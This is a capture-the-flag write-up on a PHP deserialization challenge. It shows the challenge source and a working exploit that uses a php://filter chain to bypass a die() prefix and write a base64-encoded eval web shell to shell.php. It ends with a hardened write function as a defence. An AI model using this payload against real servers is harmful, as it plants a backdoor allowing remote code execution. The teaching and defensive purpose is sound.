This challenge is pretty ridiculous, so I'm writing it down.
Landing on this page, I ran a directory scan, found robots.txt, and from there got /star1.php.
Tried accessing it via SSRF:
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
    }
    public function hasaki(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
?>
That gives us the source.
Building the payload isn't hard; it's just a bypass of the die()/exit prefix.
Use string.strip_tags to strip the whole <?php ... ?> prefix, then base64-decode the rest.
The stupid part is that there was no visible deserialization entry point.
Lots of writeups said nothing about it and just dropped the parameters in, which is baffling.
I brute-forced them with Arjun; the parameters are c and path.
This challenge is just ridiculous.
Exploit:
<?php
class GWHT{
    public $hero;
}
class Yongen{ //flag.php
    public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
    public $text="PD9waHAgQGV2YWwoJF9QT1NUW3BlbnNvbl0pPz4=";
}
$a = new GWHT();
$a->hero=new Yongen();
echo serialize($a);
?>
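As an added example (my code, not the challenge's), here is what a hardened version of the write in Yongen::hasaki() would look like: the die() prefix can't protect a write whose destination is attacker-chosen, so the function refuses stream wrappers and pins the filename instead. The upload directory and the .txt-only rule are assumptions; the real root cause, unserialize() on user input, still has to be fixed separately.

```php
<?php
// Added example, not part of the challenge: a hardened replacement for the
// write in Yongen::hasaki(). The '<?php die(...);?>' prefix is no defence once
// the caller controls $file, because a php://filter chain rewrites the content
// before it reaches disk. Validate the destination instead.
// $base and the .txt-only rule are assumptions for this illustration.
function safe_write(string $file, string $text, string $base = '/var/www/uploads'): bool
{
    // 1. Refuse every stream wrapper (php://, data://, phar://, ...).
    //    A plain relative filename never contains "://".
    if (strpos($file, '://') !== false) {
        return false;
    }
    // 2. Only a flat, harmless filename: no directories, no executable extension.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.txt$/', $file)) {
        return false;
    }
    // 3. Resolve $base, make sure it exists, and write only inside it.
    $realBase = realpath($base);
    if ($realBase === false || !is_dir($realBase)) {
        return false;
    }
    return file_put_contents($realBase . DIRECTORY_SEPARATOR . $file, $text, LOCK_EX) !== false;
}

// The filter chain used in this write-up is rejected at step 1;
// a bare "shell.php" is rejected at step 2; a plain .txt name passes
// the checks and is written under $base if that directory exists.
var_dump(safe_write(
    'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php',
    'anything'
));
var_dump(safe_write('shell.php', 'anything'));
var_dump(safe_write('notes.txt', 'plain text'));
```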